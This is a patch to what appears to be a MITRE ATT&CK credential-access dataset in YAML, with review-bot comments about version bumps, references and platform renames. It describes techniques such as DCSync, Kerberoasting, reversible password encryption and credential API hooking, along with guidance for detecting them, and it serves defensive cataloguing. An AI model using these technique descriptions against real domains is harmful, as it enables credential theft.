phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -48016,52 +48724,42 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
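Review bot: this hunk is hard to read because the diff paired T1556.005's old block with T1556.001's new tail, so review it as two independent object rewrites rather than line by line. Doing that: T1556.001 keeps `id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605` and `created: '2020-02-11T19:05:02.399Z'`, T1556.005 keeps `id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48` and `created: '2022-01-13T20:02:28.349Z'`, both gain `revoked: false`, and T1556.001 loses `x_mitre_permissions_required: - Administrator`. The only real changes are the version bumps (2.0 to 2.1, 1.0 to 1.1) and the 2024 `modified` dates.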
@@ -48083,6 +48781,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -48093,23 +48792,50 @@ credential-access:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1111:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:37:20.612Z'
name: Multi-Factor Authentication Interception
description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
(i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -48180,9 +48906,8 @@ credential-access:
url: https://sec.okta.com/scatterswine
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.003:
technique:
@@ -48241,12 +48966,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.003
atomic_tests: []
T1558.003:
technique:
- modified: '2023-03-30T21:01:46.538Z'
+ modified: '2024-09-23T22:20:10.994Z'
name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
(TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
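Review bot: T1003.003 keeps `x_mitre_attack_spec_version: 3.1.0` while losing `spec_version`, whereas T1187, T1111, T1555.004 and T1558.003 in this patch are bumped to 3.2.0. Upstream only bumps the attack spec version when it touches an object, so a stale 3.1.0 is plausible, but since T1003.003's `modified` line is not in the hunk it is worth confirming the object was regenerated and not skipped.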
@@ -48278,6 +49002,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -48287,7 +49012,6 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -48299,111 +49023,49 @@ credential-access:
id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
created: '2020-02-11T18:43:38.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1558/003
external_id: T1558.003
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- source_name: Empire InvokeKerberoast Oct 2016
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
Domain. Retrieved March 22, 2018.
url: https://adsecurity.org/?p=2293
- - source_name: Microsoft Detecting Kerberoasting Feb 2018
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Microsoft SPN
- description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
- 2018.
- url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Microsoft SetSPN
description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
Syntax (Setspn.exe). Retrieved March 22, 2018.
url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
- - source_name: SANS Attacking Kerberos Nov 2014
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- url: https://redsiege.com/kerberoast-slides
+ - source_name: Microsoft SPN
+ description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+ 2018.
+ url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Harmj0y Kerberoast Nov 2016
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
- Retrieved March 23, 2018.
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+ Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.003
atomic_tests: []
T1003.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ExtraHop
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
- type: attack-pattern
- created: '2020-02-11T18:45:34.293Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.006
- url: https://attack.mitre.org/techniques/T1003/006
- - url: https://msdn.microsoft.com/library/cc228086.aspx
- description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
- Service (DRS) Remote Protocol. Retrieved December 4, 2017.
- source_name: Microsoft DRSR Dec 2017
- - url: https://msdn.microsoft.com/library/dd207691.aspx
- description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
- 4, 2017.
- source_name: Microsoft GetNCCChanges
- - url: https://wiki.samba.org/index.php/DRSUAPI
- description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
- source_name: Samba DRSUAPI
- - url: https://source.winehq.org/WineAPI/samlib.html
- description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
- source_name: Wine API samlib.dll
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved August 7, 2017.
- source_name: ADSecurity Mimikatz DCSync
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved August 7, 2017.
- source_name: Harmj0y Mimikatz and DCSync
- - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
- description: Warren, J. (2017, July 11). Manipulating User Passwords with
- Mimikatz. Retrieved December 4, 2017.
- source_name: InsiderThreat ChangeNTLM July 2017
- - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
- description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
- August 7, 2017.
- source_name: GitHub Mimikatz lsadump Module
- - url: https://msdn.microsoft.com/library/cc237008.aspx
- description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
- Retrieved December 6, 2017.
- source_name: Microsoft NRPC Dec 2017
- - url: https://msdn.microsoft.com/library/cc245496.aspx
- description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
- Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
- source_name: Microsoft SAMR
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved December 4, 2017.
- source_name: AdSecurity DCSync Sept 2015
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved December 4, 2017.
- source_name: Harmj0y DCSync Sept 2015
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:54:08.312Z'
name: 'OS Credential Dumping: DCSync'
description: |-
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
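Review bot: the `SANS Attacking Kerberos Nov 2014` source is dropped from T1558.003's external_references while `Microsoft SPN` is added, but the description and detection text for T1558.003 sit outside this hunk; confirm neither still contains `(Citation: SANS Attacking Kerberos Nov 2014)`, since a YAML load will not flag an orphaned citation tag. The `Harmj0y Kerberoast Nov 2016` entry is refreshed the right way (original publication date kept, only the retrieval date and host updated to blog.harmj0y.net), and the same pattern should be used if any further moved links are touched.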
@@ -48414,26 +49076,88 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - ExtraHop
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+ created: '2020-02-11T18:45:34.293Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/006
+ external_id: T1003.006
+ - source_name: GitHub Mimikatz lsadump Module
+ description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+ August 7, 2017.
+ url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+ - source_name: ADSecurity Mimikatz DCSync
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved August 7, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: AdSecurity DCSync Sept 2015
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved December 4, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: Microsoft DRSR Dec 2017
+ description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+ Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc228086.aspx
+ - source_name: Microsoft NRPC Dec 2017
+ description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+ Retrieved December 6, 2017.
+ url: https://msdn.microsoft.com/library/cc237008.aspx
+ - source_name: Microsoft GetNCCChanges
+ description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+ 4, 2017.
+ url: https://msdn.microsoft.com/library/dd207691.aspx
+ - source_name: Microsoft SAMR
+ description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+ Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc245496.aspx
+ - source_name: Samba DRSUAPI
+ description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+ url: https://wiki.samba.org/index.php/DRSUAPI
+ - source_name: Harmj0y DCSync Sept 2015
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved December 4, 2017.
+ url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: Harmj0y Mimikatz and DCSync
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: InsiderThreat ChangeNTLM July 2017
+ description: Warren, J. (2017, July 11). Manipulating User Passwords with
+ Mimikatz. Retrieved December 4, 2017.
+ url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+ - source_name: Wine API samlib.dll
+ description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+ url: https://source.winehq.org/WineAPI/samlib.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.006
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
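Review bot: T1003.006 now lists the same two articles twice: `ADSecurity Mimikatz DCSync` and `AdSecurity DCSync Sept 2015` both resolve to https://adsecurity.org/?p=1729, and `Harmj0y DCSync Sept 2015` (plain http, old host) and `Harmj0y Mimikatz and DCSync` (https, blog.harmj0y.net) both point at the DCSync/ExtraSids post. Both names are cited in the visible detection text (`(Citation: AdSecurity DCSync Sept 2015)`, `(Citation: Harmj0y DCSync Sept 2015)`), so they cannot be collapsed in this file without also rewriting the citation tags; at minimum the http URL should be brought in line with the https one so the only remaining difference is the source_name. Separately, `x_mitre_permissions_required: Administrator` is removed with no replacement; if that is the upstream spec 3.2.0 shape it is fine, but it should be stated in the commit message so it is not read as data loss.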
@@ -48446,6 +49170,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -48482,17 +49207,17 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
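Review bot: the platform list for T1556 replaces `Azure AD`, `Google Workspace` and `Office 365` with `Office Suite` and `Identity Provider` (version 2.4 to 2.5), and the same substitution recurs later in this patch for T1069 and T1069.003. Any consumer that filters or builds per-platform indexes by the old strings will silently drop these techniques, so check that platform-keyed index generation is updated in the same change rather than left to pick up the rename on a later run.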
@@ -48538,81 +49263,10 @@ credential-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
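Review bot: the `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` lines removed from the tail of T1556 here are the same values inserted mid-object in the two preceding hunks, so the net effect for T1556 is a key reorder plus dropping `spec_version: '2.1'`. Because the removal and the insertions live in separate hunks, a partial or conflicting apply would leave T1556 with either a missing or a duplicated key; re-parse the result with a loader that rejects duplicate keys before merging.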
@@ -48625,28 +49279,94 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
